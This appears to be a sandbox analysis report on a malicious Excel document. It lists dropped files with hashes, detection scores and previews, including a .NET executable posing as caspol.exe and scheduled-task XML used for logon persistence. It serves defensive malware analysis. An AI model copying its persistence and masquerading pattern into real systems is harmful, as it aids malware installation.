Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nciq3grm.lg2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nhcsbggo.ids.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\obpkzk1o.evr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\pbxhumih.acz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\pzazcyvl.apm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\qkhcf1he.sjb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rbhecyfe.bso.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rbr025wt.c3d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.115370849452323
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
MD5:	E058C7784A46B7B4C0F0C61CC4447BD0
SHA1:	AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
SHA-256:	AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
SHA-512:	402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpBD09.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.115370849452323
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
MD5:	E058C7784A46B7B4C0F0C61CC4447BD0
SHA1:	AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
SHA-256:	AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
SHA-512:	402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.115370849452323
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
MD5:	E058C7784A46B7B4C0F0C61CC4447BD0
SHA1:	AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
SHA-256:	AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
SHA-512:	402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\ucthgg5f.5ve.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\w5o0oner.4vr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\xom3sqmd.fdn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\z5gzz5np.eks.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF1E21D1D32977F7B4.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF20504052B57F2B3B.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8D749C68F60D88F7.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	684032
Entropy (8bit):	7.939203225580475
Encrypted:	false
SSDEEP:	12288:SI99FGvFclV7LdlW5VRqfPSMCfhhBK2leSPKpWAM6BPLwdnhr8y/m:jF8FclVLdSRwSNjBK2pP3uTaui
MD5:	9056E7D1B5F0099E182E04F711813A5D
SHA1:	F6761B80F93157E459E61D2DCA7CF0788D1ACE23
SHA-256:	AD587E9695B7031A7D04EAB04D9F344145743114166D958ED0949185CBEBEB12
SHA-512:	B522F58EDBA6A18DCF7FB757E46A7A399DD6ED936493D3680613689428F585EAA7069A249ADCDACE867358E661FBF3916C433B592C5F0B85CFE4751197641B04
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAAE5253A99F2DBD6.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	676352
Entropy (8bit):	7.983748563667265
Encrypted:	false
SSDEEP:	12288:ZI99FGvFclV7LdlW5VRqfPSMCfhhBK2leSPKpWAM6BPLwdnhr8y/m:aF8FclVLdSRwSNjBK2pP3uTaui
MD5:	1F200A744738FDC958B56ABC4DE2B5A1
SHA1:	62ECBAB3E465296C3DBEE22BB01ECB2097C4C9B2
SHA-256:	08EB126BE6536499655BB5B6C4C9C898D251D6BB5B4A34E86D49BF205C10C26C
SHA-512:	7FC6105F3E737092A6B7B4591199D42A6FA63E6D8D4F0FB208FDC27D0E129B3CA1C96B3EC7A7D93844237013FC1C17653F3734F358340484B2D1A205476940CC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.6739662216458647
Encrypted:	false
SSDEEP:	12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
MD5:	C61F99FE7BEE945FC31B62121BE075CD
SHA1:	083BBD0568633FECB8984002EB4FE8FA08E17DD9
SHA-256:	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
SHA-512:	46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
Malicious:	false
Preview:	....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.\|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	0.7513521539333206
Encrypted:	false
SSDEEP:	24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
MD5:	8A8D71BED4B5760F2F82C680C2C8CACC
SHA1:	FA589EA7BA858C514079289BCEA3625432110427
SHA-256:	78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
SHA-512:	8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
Malicious:	false
Preview:	...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...\|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...\|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.915042903583073
Encrypted:	false
SSDEEP:	12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
MD5:	74061922F1E78C237A66D12A15A18181
SHA1:	E31EE444AAA552A100F006E43F0810497A3B0387
SHA-256:	89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
SHA-512:	306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: ECxDwGGFH3.exe, Detection: malicious, Browse Filename: greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\caspol.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.915042903583073
Encrypted:	false
SSDEEP:	12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
MD5:	74061922F1E78C237A66D12A15A18181
SHA1:	E31EE444AAA552A100F006E43F0810497A3B0387
SHA-256:	89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
SHA-512:	306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe

Download File

Process:	C:\Users\user\AppData\Roaming\caspol.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.915042903583073
Encrypted:	false
SSDEEP:	12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
MD5:	74061922F1E78C237A66D12A15A18181
SHA1:	E31EE444AAA552A100F006E43F0810497A3B0387
SHA-256:	89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
SHA-512:	306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\Desktop\2D330000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 21 00:20:57 2024, Security: 1
Category:	dropped
Size (bytes):	935936
Entropy (8bit):	7.986071502419832
Encrypted:	false
SSDEEP:	12288:pI99FGvFclV7LdlW5VRqfPSMCfhhBK2leSPKpWAM6BPLwdnhr8y/mVqsn8qiaapB:qF8FclVLdSRwSNjBK2pP3uTauiZs8h
MD5:	EA87FC894BA7415C83915F80E43B0CA9
SHA1:	7CEFD9D05D0ED4163EF060AD240D1925C36C9846
SHA-256:	1F9E81255F9750325B2C4A66B37C01C8391D05C157856A4E1051AAAEB0774835
SHA-512:	094617C2AFC0E58E3D6584F66FD010A906E36835CF707B6D0A5C314C30921A653213755B7486A4CEAF9857DFCD26BDA08918709CF0C3D37077E294DF65372DD6
Malicious:	false
